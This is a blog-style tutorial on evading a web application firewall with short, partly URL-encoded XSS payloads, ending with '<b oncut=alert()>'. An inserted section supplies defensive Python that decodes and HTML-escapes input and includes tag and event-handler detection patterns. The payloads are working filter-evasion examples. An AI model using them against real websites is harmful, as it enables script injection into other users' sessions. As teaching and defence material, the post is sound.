
Bypassing WAF with Shortest XSS Payload

Welcome back, XSSers! Today we are going to learn XSS, bypass a WAF, and do it with the shortest payload possible.

So I have a webpage here, and I am going to enter our classic payload, i.e.

<script>alert(1)</script>


Oops! Access Denied! Looks like some WAF is blocking our way. So I am going to encode our payload with URL encoding. You can find websites on Google that do this, but I like to use the HackBar plugin for Mozilla Firefox.
So I entered my payload and clicked on the Encode button,

and here we have this beautiful URL-encoded payload.

So let's see if it works or not:

%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e


Hell yeah! We successfully XSSed it!
Hmmm, that was really easy, but what if the search form doesn't allow us to enter more than 35 characters? Or 25?
Let's try to shorten this 75-character-long payload.
First of all, we don't really need to encode everything. Why would a WAF block letters of the alphabet? So let's find out which characters are blocked by the WAF by trying different variations of the payload:

%3cscript%3ealert(1)%3c%2fscript%3e Success
%3cscript>alert(1)%3c%2fscript> Access Denied
<script%3ealert(1)%3c/script%3e Access Denied

...

%3cscript%3ealert(1)%3c/script> Success

And actually we can also use alert() instead of alert(1). alert() will give us a blank alert pop-up and will save us 1 character.
So here's our final payload with 31 characters:

%3cscript%3ealert()%3c/script>

As you know, JavaScript is not limited to the script tag. So let's try to create payloads with different tags and event handlers:

<svg onload=alert()> Access Denied
%3c%73%76%67%20%6f%6e%6c%6f%61%64%3d%61%6c%65%72%74%28%29%3e Success

I tried different variations of the payload to find out what needs to be encoded, and here's what I got:

%3csvg onload%3dalert()> Success

Thus we shortened our payload to 24 characters! Can we make it even shorter? Yes we can, and actually I did. Take a look at this beautifully crafted payload:

%3cb oncut%3dalert()>

Without encoding it looks like this:

<b oncut=alert()>

If you enter this payload, nothing will happen at first.

But as soon as you try to cut some text from the webpage, the oncut handler fires...

and you will see the miracle of XSS!
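As an added defensive illustration (example code written for this edit, not from the original post or its author), here is why a filter that inspects the raw query string is defeated by the partially-encoded payloads above, and what closes the gap: percent-decoding before inspection and, more importantly, HTML-encoding the reflected value so that no variant becomes markup. The filter patterns and test inputs are constructed assumptions rather than the rules of any real WAF, and the bounded decode loop also covers double-encoding, which goes beyond what the post shows.

```python
import html
import re
from urllib.parse import unquote

# Constructed test inputs: the variants discussed in the post plus one benign value.
PAYLOADS = {
    "plain_script": "<script>alert(1)</script>",
    "full_encoded": "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e",
    "partial_encoded": "%3cscript%3ealert()%3c/script>",
    "svg_onload": "%3csvg onload%3dalert()>",
    "b_oncut": "%3cb oncut%3dalert()>",
    "double_encoded": "%253cscript%253ealert()%253c/script%253e",
    "benign": "search for cats & dogs",
}

# Assumed signature rules: a literal tag opener, or an on*= event-handler attribute.
TAG_PATTERN = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.I)
EVENT_PATTERN = re.compile(r"\bon[a-z]+\s*=", re.I)


def naive_blocked(value: str) -> bool:
    """Filter of the kind the post defeats: it matches the raw parameter
    without decoding, so a percent-encoded '<' or '=' never hits a rule."""
    return bool(TAG_PATTERN.search(value) or EVENT_PATTERN.search(value))


def normalize(value: str, rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded), so %3c,
    %253c and friends are inspected as the '<' the application will see."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def normalized_blocked(value: str) -> bool:
    """Same rules, applied after normalization: every variant above is caught."""
    return naive_blocked(normalize(value))


def safe_reflect(value: str) -> str:
    """The real fix, independent of any filter: the app decodes the parameter
    once (as a web framework would) and HTML-encodes it before reflecting it,
    so '<' and '>' can never open a tag in the response."""
    return html.escape(unquote(value), quote=True)
```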

Thanks for reading the article! Actually it's based on an XSS challenge held in the Ultimate Hackers Facebook group, where members competed against each other to achieve XSS with the shortest payload.

Well, that's all for now! I hope you learned something new today!



About the author

D3V

I am Somdev Sangwan, also known as D3V. I am a n00b and I love computers and hacking. I am a Python freak and your friendly neighborhood hacker.
